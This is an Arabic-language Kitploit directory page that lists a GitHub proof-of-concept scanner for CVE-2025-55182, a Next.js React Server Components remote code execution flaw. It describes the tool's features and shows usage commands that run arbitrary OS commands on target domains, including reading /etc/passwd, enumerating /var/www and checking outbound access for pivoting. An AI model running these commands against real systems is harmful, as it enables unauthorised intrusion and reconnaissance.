Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/devvaibhav07/poc-cve-2025-55182
ماسحات الثغرات الأمنيةتوليد الحمولةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرة
GitHubdevvaibhav07/poc-cve-2025-55182

POC-CVE-2025-55182

POC-CVE-2025-55182

عرض المستودع
2منذ 9 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

الماسح المتقدم CVE-2025-55182

أداة استغلال متكاملة الميزات لثغرة CVE-2025-55182 — تنفيذ التعليمات البرمجية عن بُعد عبر مكوّنات خادم React في Next.js. يقوم الماسح تلقائيًا بصياغة حمولة multipart ويستغل process.mainModule.require('child_process').execSync() لتحقيق تنفيذ أوامر نظام تشغيل عشوائية على الأنظمة المعرّضة للثغرة.

الميزات

  • مولّد حمولة تلقائي — لا حاجة لترميز يدوي
  • تنفيذ الأوامر مع استخراج نظيف لمخرجات STDOUT
  • اكتشاف تلقائي للبروتوكول (يُضاف https:// إذا كان مفقودًا)
  • فك ترميز URL بشكل صحيح + استعادة الأسطر الجديدة
  • مخرجات غنية ملوّنة لتغذية راجعة سريعة للمشغّل
  • بصمة الأخطاء (500 / 403 / SSL / انتهاء المهلة / أنماط WAF)

التثبيت

chmod +x scanner.sh

الاستخدام

Default scan (executes 'id')

./scanner.sh -d vulnerable-app.com

Custom command execution

./scanner.sh -d vulnerable-app.com -c "whoami"

With explicit protocol

./scanner.sh -d http://localhost:3000 -c "cat /etc/passwd"

الخيارات

Screenshot 2025-12-09 at 16 13 23

أمثلة

Verify RCE

./scanner.sh -d shop.example.com

System fingerprinting

تنزيل الأداة

./scanner.sh -d shop.example.com -c "uname -a"

Enum writable paths

./scanner.sh -d shop.example.com -c "ls -la /var/www"

Pivot helper — check outbound access

./scanner.sh -d shop.example.com -c "ping -c 4 google.com"

لا تتردد في التواصل عبر mailto:[email protected]